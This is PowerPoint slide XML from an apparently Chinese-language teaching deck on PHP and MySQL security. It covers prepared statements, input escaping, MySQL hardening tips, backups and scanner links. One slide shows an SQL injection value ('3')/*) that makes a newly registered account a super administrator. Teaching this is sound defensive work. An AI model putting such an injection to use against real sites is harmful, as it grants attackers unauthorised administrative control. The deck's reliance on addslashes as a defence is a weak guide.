              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>php_pdo_mysql.dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>前面的分号</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>pdo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> = new PDO("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>mysql:host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>=...","root","");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> = "select * from users where username=? and password=?";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>pdoStatment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> = $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>pdo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>-&gt;prepare($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>);//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>返回数组形式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>pdoStatment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>-&gt;execute(array($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>user,$pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>$res = $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>pdoStatment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>-&gt;fetch();</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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>表单输入框中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>对关键字进行过滤，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>在预定义字符之前添加反斜杠</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>$user = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>($user);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>$user = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>str_replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>("%", "\%", $user);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>$user = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>str_replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>("_", "\_", $user);</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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>超级管理员</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>莫让别人成为你网站的超级管理员</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，例如我们网站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>grade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>代表用户等级，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>代表普通会员，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>代表普通管理员，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>代表超级管理员</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>一般写法</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>insert into `users` (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>username,password,grade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>) values ('$username','$password',‘1');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入方式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>insert into `users` (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>username,password,grade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>) values ('$username','$password','3')/*,'1');</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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>保障</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>安全的方法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>避免从互联网访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>数据库，确保特定主机才拥有访问特权</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>定期备份数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>禁用或限制远程访问</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>用户的口令并改变其登录名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>移除测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>(test)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>移除匿名账户和废弃的账户</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>保持数据库为最新版本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>启用日志</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>常见的漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>文件漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>客户端脚本植入攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>跨站脚本攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>垮网站伪造请求攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>……</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>数据库的备份</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>使用命令行备份</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>cd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>目录下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>文件夹</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysqldump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -u root -p flaws &gt; D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:\abc.sql</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>安全检测的网站</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> 360</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的网站检测：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>http://webscan.360.cn/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>腾讯网站检测： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>http://guanjia.qq.com/online_server/webindex.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>百度网站检测： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>http://bsb.baidu.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>站长工具检测： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>http://tool.chinaz.com/webscan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
